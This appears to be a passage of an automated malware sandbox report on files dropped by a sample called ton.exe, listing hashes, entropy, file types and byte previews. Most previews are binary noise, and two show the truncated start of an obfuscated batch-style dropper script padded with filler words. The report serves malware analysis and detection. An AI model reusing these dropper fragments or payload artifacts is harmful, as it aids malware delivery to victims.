                                                                                                                                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):135362
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.971839982343486
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3072:RLs5z/M7t0/zZsKAWiHSD1m6NjqdTg07EGUDaIPvgLHoT:ZsqolsxaN+dm1
                                                                                                                                                                                                                                                                                                    MD5:49716BF75C0E3A1E9F23745268258363
                                                                                                                                                                                                                                                                                                    SHA1:4214668269D6FF92A238371B3DFFC9E34D8EB342
                                                                                                                                                                                                                                                                                                    SHA-256:C3B0F800BA960A800FDE60859E6E382FD810D06B8C36BE9D1A850C97A19B2A7E
                                                                                                                                                                                                                                                                                                    SHA-512:5635A7E5E3F9A4774677910EA48A98DBE8B87540D0E0A2B0483A5E699108AB171D82D3B2459E2E2E00AFEE059A9B1663D5BA84B01338F49D7232C31D9303E2F0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...2...2......?......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H.............................2...........2...........pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^......IDATh..Z.t\.y.f.fF.b$.....2.%.0`...qR..&.J..4...a+1.p....z ...J....p @h....W..E.b-3...w.<i$.b..........+.S.Ip*....\n...7..#........m.......s....3~..D.nn.,.y.Q..@eA5f.7`F.L.e.#3#.nX.*.D.n...n.U.e.g.\H...>IW.s.s..!.D.r[.K.....-k.r..x...@.(..<O6<n.D..r.TmD.$c.'z..A....../..?@]Y.....2...d....J...+.t=.l.}.!.RH.I..H`..xo..X..)...e.. c..n#..d...p..Bz.*....(.$....4E:.L.
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1175), with CRLF line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):22821
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.102137119485149
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:384:8SYDlEJn081K5T28LUAcXDI+PhQwdHKVamhS2BdrLCCiOumnRxZD3yCRUcmDe:UEJn0+wTFLkXc+ZQwEQm823rL/jpfOe
                                                                                                                                                                                                                                                                                                    MD5:D44A385CC227AF23C9FE260383A2FC76
                                                                                                                                                                                                                                                                                                    SHA1:3DC7E628BCBEDB86D3F41BA129AE6B6B87828463
                                                                                                                                                                                                                                                                                                    SHA-256:859C780C270D94EDE0B69B1C28B75EF579DBC98095BA411B98744DE25C87808B
                                                                                                                                                                                                                                                                                                    SHA-512:DE7802FA7228332DD80593B3B9487E7C293621520A4A290202035685987FFAC9041FC5A6F033FC53E4E0D150D6C0427C5872A1C70988048D2666A79F744ED2AE
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:Set Professional=t..fcjgLean-Develops-Merchandise-Dp-Begins-Atlantic-Cassette-Teeth-Critics-..hyLCandidate-Bias-Max-Finest-Schema-Speaker-..CCzWorkshops-His-Stereo-Licensing-..uwsAcademy-Prague-Wiring-Innovations-Mirrors-Operating-..LmNVHyundai-Broke-Purchases-Privilege-Resorts-Babies-Intended-..mYKTerrace-Blame-..fzHDash-Rouge-Central-..bytCity-The-Quad-Appearing-Serial-Inspector-Providence-..fiQAnytime-Mistress-Throughout-Between-Anatomy-Workstation-Seven-Mill-..ZHaLevy-Prev-Tons-Effective-Kuwait-Distant-Multimedia-Peterson-..Set Designed=q..DSModerate-Congressional-George-..GuLocal-Herb-Starring-Chances-Themselves-Marco-Confident-..rJwnChannel-Called-Indianapolis-Does-Niger-Org-..OpIfVariations-Niger-Cleaning-..LEIsAv-Trouble-Adding-Designer-Babe-Consultants-Au-Reactions-Innocent-..oyBecause-Incident-Renewal-..CZTurned-Fingers-Require-..UXWConcern-..yauBases-Controlled-Ic-Agreement-Lost-Hostels-Signs-..LmCatalogs-Prints-..Set Peas=x..AwnTrademark-Chuck-Builds-Ccd-..LLmFPlayer-Contro
                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1175), with CRLF line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):22821
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.102137119485149
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:384:8SYDlEJn081K5T28LUAcXDI+PhQwdHKVamhS2BdrLCCiOumnRxZD3yCRUcmDe:UEJn0+wTFLkXc+ZQwEQm823rL/jpfOe
                                                                                                                                                                                                                                                                                                    MD5:D44A385CC227AF23C9FE260383A2FC76
                                                                                                                                                                                                                                                                                                    SHA1:3DC7E628BCBEDB86D3F41BA129AE6B6B87828463
                                                                                                                                                                                                                                                                                                    SHA-256:859C780C270D94EDE0B69B1C28B75EF579DBC98095BA411B98744DE25C87808B
                                                                                                                                                                                                                                                                                                    SHA-512:DE7802FA7228332DD80593B3B9487E7C293621520A4A290202035685987FFAC9041FC5A6F033FC53E4E0D150D6C0427C5872A1C70988048D2666A79F744ED2AE
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:Set Professional=t..fcjgLean-Develops-Merchandise-Dp-Begins-Atlantic-Cassette-Teeth-Critics-..hyLCandidate-Bias-Max-Finest-Schema-Speaker-..CCzWorkshops-His-Stereo-Licensing-..uwsAcademy-Prague-Wiring-Innovations-Mirrors-Operating-..LmNVHyundai-Broke-Purchases-Privilege-Resorts-Babies-Intended-..mYKTerrace-Blame-..fzHDash-Rouge-Central-..bytCity-The-Quad-Appearing-Serial-Inspector-Providence-..fiQAnytime-Mistress-Throughout-Between-Anatomy-Workstation-Seven-Mill-..ZHaLevy-Prev-Tons-Effective-Kuwait-Distant-Multimedia-Peterson-..Set Designed=q..DSModerate-Congressional-George-..GuLocal-Herb-Starring-Chances-Themselves-Marco-Confident-..rJwnChannel-Called-Indianapolis-Does-Niger-Org-..OpIfVariations-Niger-Cleaning-..LEIsAv-Trouble-Adding-Designer-Babe-Consultants-Au-Reactions-Innocent-..oyBecause-Incident-Renewal-..CZTurned-Fingers-Require-..UXWConcern-..yauBases-Controlled-Ic-Agreement-Lost-Hostels-Signs-..LmCatalogs-Prints-..Set Peas=x..AwnTrademark-Chuck-Builds-Ccd-..LLmFPlayer-Contro
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):84992
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997902390720399
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:JxonC8E6nGZXP/iWHcD55QmElicGo1kDV4yDHLveEIn3XBUHWkYFq75WYELd2SjE:jjZ6GZXHz8D5mmEl9kV4Ure1nHJ3qgYT
                                                                                                                                                                                                                                                                                                    MD5:A2EB6E1E1958ADEE6E72CC432038FE9D
                                                                                                                                                                                                                                                                                                    SHA1:D1CF04DC7220AA5566F93CC85041070649751DD7
                                                                                                                                                                                                                                                                                                    SHA-256:86DF3DF60EC52D7739B8A9BADBD49012C2A867E0444A39EC743EDE744C8A9205
                                                                                                                                                                                                                                                                                                    SHA-512:691CC16A52F688DBA62835B68B5F95DCF90414801842400D7F946098A1A14A3C1652E15796007BCE3775F485E9CE465CA53611E506C2C26CC23AF9AAA71C42E6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.Rb.,.@... B>'.$..\.....YW.J|.(........U...*/.:.....%.I..>..I.$....F.J..9i..<o.EjJ.tJ.h.31.....i.z].....3....PM)..qw....T.=..._.A...y...\......^.cw@...Hy;R.....5..C+m;l...Q.....T...a.h.....N.,...La.f...&.X!.S.....Z.;'_.D..yv..[.^c....W..Q......Yv...|.o..]..8.L..aM..!+3..{hPd..^.Z...1.O.Yp.....N.Q.2[.zyaKS...]l.xh.E....................s...]>:.fX@..?#.o.0...I.eK.....Eb..ar0....kn....$...)0..+.5...U.[.}....9.@j..p.pufw9.9.?..a..H...2.....`../..M..SK..^...z.@.M......a.=.......T.{Q.k{"...MHw....5..d....R.. (2..n..#...bj&.oG.....+".Q..Y*..s...S.5$6.........3._.\...<..l.K..ir.V..._......f..`..[.1..+...W>...\.v....................*.Y.....]<............H.*.8.".........%...cl )....:..1..ic..H.6p.S~&=U.v8n.+I.#Wb..^.8..l..S.k.....[.6.ni.}.D.t...Y..!.(.n....Y_.=0..`M+.....H.+...b..^47c...0...z.`.nm.7...Lr;.*....'..En.).A)..x.....;QzQ....vr..L.Bm.q...'.r5...P9~P.\^.8....G..T......$j.E...p....g..1..........F..|..P.W~s....N.PO.b7..wU..,........b.
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):893642
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.620330704672109
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12288:5pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:5T3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                                                                                                                                                                                    MD5:BBA2FCA490B1E57BDF0930995014E268
                                                                                                                                                                                                                                                                                                    SHA1:46486DFF63D5AB36A3A087844CD96CC98157FBB3
                                                                                                                                                                                                                                                                                                    SHA-256:C8B826022AB1211652FBC65AE9518EEA42D18136A159EB491BF2BB83CE35FA79
                                                                                                                                                                                                                                                                                                    SHA-512:0D3F6280AC256085CA3D9542849813EB2EB5FD2E26EDF6A543035289ED1164A2A4E0691176BB0277654F2F47EE050446B588DE592CDB281AF9568A9F0A99FA16
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:closingscriptsbeachescomplicated..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..............................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997659665279739
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:dFpO34UPb+UnO1osF6PICEBf25hbMKknGSO4mxDZmlMQAXo:dFoPafom6PICSHKknTKZgM4
                                                                                                                                                                                                                                                                                                    MD5:D7A70FE1679D0572AECE6F5C117DA7CC
                                                                                                                                                                                                                                                                                                    SHA1:D3AE014E818386840A78415170984F3D1987F45B
                                                                                                                                                                                                                                                                                                    SHA-256:1D6445191F7A955D6A9D0BA4968C0C9492743AEFF4BB44FF58D68DEF5C2EF45C
                                                                                                                                                                                                                                                                                                    SHA-512:10C64CE8866AC68DF74396096735F6949EFBB96EDFFED02AD03F320DE70514B67BA604D0407A6EA84C721CFDCA6F03E639B11E7B559A1795BD77C8E70869F75B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:..(.gq.......|..).Q-".NA.rUX....zo......HU.Lct;....M..<......b.x*....n...#....d)....T.W........'.......s.U|3X.{jMAV.,3t....8{.......'.*..XSI.|;...*1...v`*...E....5...`M..T..|...+............. .3...6.*V.*\...,z....VGF..P.............].i..fI.wr....].h..Yd.u.k0.C...55...y.r..7....\..m.UjU-Y../c#.]B.3&(..Y.B..jFV@..C...eXJ...../.F...MgxfJ...jL.g.....;........P...]..+.$.h../..n...z.8.\.!.?wO....H.._...}=~3"y...P.KT.5..6.p.!n.)%..v...@..K.o6../.E.P...[.*../........2..R....p...3.L....n.sY..N.f..k8ue..0...[@../I.a.n..F..KlQ......}.)..Z._gf0.QQ../..,!..".C.G..S....* m[.pm9N....&.%.G..E...D.z\U.....k]M`..5.`..v...6sQh....i....p...K*........o...#...0K...........9..._z.r$.o..T..^.A.Vi.u..l.9.O...)...9.7.5.XtO.w...I.c....*8...n!e......h.....8.;..e.h..M......nM.O.c......~..^.........E`.1.%.......{.o.e....$....N..v...A..'.f..2..C:h.....>y3.x1 .N.....[V.p..T?.k...75!e.S.gH..P...H.W...<....~.O...|.-$.F..A.E....Yx..a.Z'......i..>....-....;....(...
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):101376
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.998222855402838
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:3072:YLIeu2uzPQ1y/Pt2ESQElCSGLyIgTDILjF:YLIeyU6PtRSzlMfW0J
                                                                                                                                                                                                                                                                                                    MD5:09958161E7EFEB5822A3F9093174E167
                                                                                                                                                                                                                                                                                                    SHA1:B8FA478D4161E7D8413F66DDA9CCDE94AECE4C10
                                                                                                                                                                                                                                                                                                    SHA-256:C8A36E99D2304A25E3FE749F0F33595CF3A0A06CA3DB4800411299E8381462B7
                                                                                                                                                                                                                                                                                                    SHA-512:FC186A39BE9BB17FEEC9AA9FBA85536C517F923A30CDAB6DF4713392549AF0E4661C7B604D0AECD287DB70EC9616790BFF6C971410E7127874EC51DE3F47B7ED
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:..^.?.....{...T.je..<.vs`..............!HTiAiTx....o.pZ8...n..*<;.N]..0..'.r..0.+K.QI.ET.H[%;j|e:..,.z.Rv.....S4..:1.$...~.S.C@VI.L6_U..:....:...y...>~....M.....a.{......''1..$...2..(.D.U.....2...(.V2....u..E..qw?F...:B..hm.X..........:.N..Ke`X.cG..\5I..S..J.b+H.{y..6.E....}..^....$G.t.W.."....NM.]..}./...7M.B....6|...=CA.1..nwy...>..,'.fgR.k........w|..S.;.t.xo....PPS... 6-y.j....(.K....76........O....=7..,.....+f./..k..e'.....N.....k.U.hG..k...8..'1.......6...$+...<......2.O..,.T..Dz...,.<..yw....7)7B.k?.`.\.'...u=I...[.PA;Jw.9eZ......5..I...<...D.{..Y...=..7.\..(qo.;C.....V.3l..M.kk.0.$... ..#.C.J...f.T.9......=..Ht..AX...'.....'...qg k.i..]GN<....n....~.')9.'.$.b..3.....R..P$.9.n.....V..w. ...tO...V{6..".>.LV.~.....E.\y.|..Y ...Y...>..!.y;.5.#3...:.6\...#..yb..2....8..i_?R...m..c..a.l.].......P=CA.P...|...*..".7-..[.>b.x./.%B`Y.J.a.fC....c4.....z..)...fo..h.f.@...U.0-.V.(4.1.G.2[..d&S.J.4.'..c..E..."..Wr.}^..-v....G..U*.;9..DuK....p...3=.<C=
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):81920
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997903726550937
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:GdZybRlL9Sc42ZYfO1oy1tIGHv0GDRQGvPlmi7WZ20hgT8/32He7Ww5:rbrR+ioy1n0YyGl7u20hQuw5w5
                                                                                                                                                                                                                                                                                                    MD5:6A77756ACA300EED6D892F1B8ABDF356
                                                                                                                                                                                                                                                                                                    SHA1:271891D1C9D842D8C44ABC4A25D9BDB4AE5ED134
                                                                                                                                                                                                                                                                                                    SHA-256:1D8FAE838C9D5A92AA5A70BCE377E13C8BE4A51EEB7EAC6E93544D53324A7E43
                                                                                                                                                                                                                                                                                                    SHA-512:896565FD6D0E31D974FAD3ABF3CD7502148A3DC41ABC54C222C60A999AFDF9AFF57F035329DB4B2C226B814785EF6DA92FCA99637F36B484C6CC8A02E7064361
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:..........]JI........XhS..w.^..a...Hd.. .&.8%.....U.+.<.l.&....3YK....m....]..\.....RHv..'OM......g...a1| ...OEf.....o.?./u#*t......N.5..Dmu.m..X....du8...W.q.6h.`n.;..^.....(.us.1..h..ZoQ.f..+S..../.....g...}..6...9u^.~.m8.*p..*|.)M...m......>.O..w.(.YE.Y?.3hd..c.a>..z.'..{4......:...o.8.O_W....c4!$e.U.......u ..1.%vtj........-(.....EXn...p .w@3.m.....P.."...Z..-........:..j&......a:/m'.\..u.....H<.7.E..k...K.(......;..|....^rq~-.V5Fa.O5s...&..3.2.d.....#......-...q..Kv'.Dm..W..).M,'...d)p..o.....c8l....G~.....2..r..:..Fj......O.).OUd.B7.q.O....wTq@.1....:..[..f@... .'._.<;tWEPy.....%.J...ijJ....:f..........:?...2a.. ....>r....w.S..M.!...g..h...w....$..@...`.....=].?..F...ld.L..,......E.W.?.=.5K:8`>JA.'.?...@..&.......(.{....I.UyNf....!.`I9>....W......O...%z..{2..G;....#...........h.|.C.....BjN..V..%0K`!..\. p~n-..Q...'.e...V.Y\r.....{....n..;.$..P....n#..1..hQ../u......'.].$...C.Q...6....g.oV3n..G(..a..z3.J.2.n..1..NF.0.....4a`....\
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):52224
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.996719318991437
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:768:I3fus3XHgd38IZInbLML2YNCBgo/ITxGglxcHr501jZCj7cnjsQrbVg+BkcQ:I32s3Qd3RIbGNCBLgxl0r52jkj7Gj1Ng
                                                                                                                                                                                                                                                                                                    MD5:00A3347BD3F50648F9F3A4B4ECFEC9A4
                                                                                                                                                                                                                                                                                                    SHA1:F98E9583E8374DA1C532285B3B3503238351AD21
                                                                                                                                                                                                                                                                                                    SHA-256:78E968815EEC2E256F4109ED1E25A2E794996E193C6D4544F72BE51AB5E42313
                                                                                                                                                                                                                                                                                                    SHA-512:BD5DD6F56C454E8B557DEDBA6BE01A8DA2394A65657C1F8D214267E57896F7E20C041B68C27999E7AB909653D62C99C1DFF03FE54690180442F050F4650F8EAC
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.#W....y..x...?hR....$.Dq.bs....B..~.....k..&.......d`.......[...W...@/C.^..R./8.......fZ..0...U...~.....$Z.=]l...(l.j..)..4.....r.@.a..>.$.....\C..].$....oV.Q........M.....7....V...?{J.Z.gh]S..bUrr....1..{. ..\'v...s..#[mo.@.(....K.=....d...FZ.c..z..f.....R.......{...X+...i.,2....K.Q..Ej.>cw)moIb]...l.......d#.h...1..u..d....A../>u.&...kh......fv{l.2f.I..o.9.........=.jJ.yj\..<.#~....f.....Sfi..J.N.O;..jg...d[..Jvo.8./%LE.[..k..V.]...]o........~ov...."......VQ..'..{d..}M...<;.......d.....8.........g.@XC..KA..Z....2\Q...t?....Gn[p*n<..;=v...&x..h....d.;.)b..K..Agp..p>=.F....z,..P....e.o?.|N.%.X...<.L.T2.E.y.....\....~....W.O.?\^..q...I..r .....5..vA..k.....=.`H........"..1.\J=..0`".7q.b..9.:S.^N-H...Qk.%..S.$`0c) 7%$>e.]...KZ.H..Ul..F..@.tHe.Y!.xp-;...ZU:..y[.o_.......n..y..?.V.<*.....>4e].H.D.H.."...t...06.T....&.{....n.d...u~...N.OZ..b.%........#.+W~.S.?.....?..."_H.......n..$. S0......q...@..}0o..?|.b.5.w....G=...-N....!..V.PO(!.... o..
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):82944
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997556562614783
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:r+vRnaB9jYBhIH9v35oh+1DNqHGwtnL6Cf8+p4ulNXN9fkNWFzLtpGqdCCQy:r/B9gM9v35o4BNOtnL6CEC4ufXN9KWrv
                                                                                                                                                                                                                                                                                                    MD5:F176CC361DD12B9ABDDB5ECE3BB534AA
                                                                                                                                                                                                                                                                                                    SHA1:F6B516A84DA0B2EDA6585E17BA2B17FDD0BB6E38
                                                                                                                                                                                                                                                                                                    SHA-256:A779096514C530585C09E9712B39377A991543644951ED90071C7CA8732434CD
                                                                                                                                                                                                                                                                                                    SHA-512:3433D54A2F61DD341E5A676111A660C2EDA4A94ADB95790802608123ABD3AFE5DD014599AA66DB8B427D0CA7F06711A54DDB7462F5B6C74D5DE5D6781A297280
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.....A...q...I...R.....9..-.....5..D...Xv..N_...C.A#.'a..G...l\A......L3..g.^...s."..Ap..`-.8...@8...@^'..t..-. MV..OY..)...!...7`._..}5..;....g.z{.^5/.SO..w >..H..Lp'A.&..{..M...p$v}..q0.4v.....E.0ux.R..*.ANy.9.J.;...c.S.b.J.r*...z....@.:...........&.....k..w.T. ...N..{R.Q*.]}Q.I.3....-._..rFL$(.....l....`.?....[...?n~(e@..d.1...8...g..F..;l,S.c.9Ee.\E...%.1B@.s..f...Fq.m..r...#..m.e..-.+.}....hg.[<r.O.i......+...sE=._.!./..YG.........[...FJ[.,].%.Dz..E.."......ot.N........y.G.WL.M8'j......9e4!..c.k.~}./.H.p.'........c.T.....jm."...o.$M.}..`...QLP.BR. ..V.p;.......mS7v...x.C.....K{.^.e.u.)v=y.E..a..~`iF.|.\........2..y....E?..<.....4.n..z.$....Zx.i|.y...My:..{..&.:z....+k..b. .(i./......FQ$m.....*..Zj.....*..9..i..L...G.O.......V..7.=.}<..n.AY....$.{.4....a..Y.S..Zl4Q..l.....~.hWze.I.5.1[7.N.a_..x.{.....d.?.....'..]..r..7.=C[.w.._.,...bR@^..&.....Q.8;.b.w.b...8d.^..#....V....>.l2#L.A.<..I.3\.......(&.......->..^N.f..)}..N.,._q.q.O.j.d.@
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):7609
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.975520982934233
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:fQvryJ2Yp/Ma+Qi7NdnyEGNipLrp+HeCd/dzPtdQ4kIWc3cc:pJr0tQiRkNildUeGtY4BWcsc
                                                                                                                                                                                                                                                                                                    MD5:3CB76D8C05A5CF3226635DC8B15967FF
                                                                                                                                                                                                                                                                                                    SHA1:CF0B40BE913FBDB136BE218F8A6369C1DB9034C5
                                                                                                                                                                                                                                                                                                    SHA-256:58A523118409EEE2AC4E2C00203244B5D4636536DAD4F9B15625193DDD4427D8
                                                                                                                                                                                                                                                                                                    SHA-512:72C785F80957E276472C860F8B439241A9A451136F1ECEDF93E09382DBCFDB520D34F798CB464B2FC23378578FCE4AE9553C86063B4A44674107DB6482736F8D
                                                                                                                                                                                                                                                                                                    Malicious:false
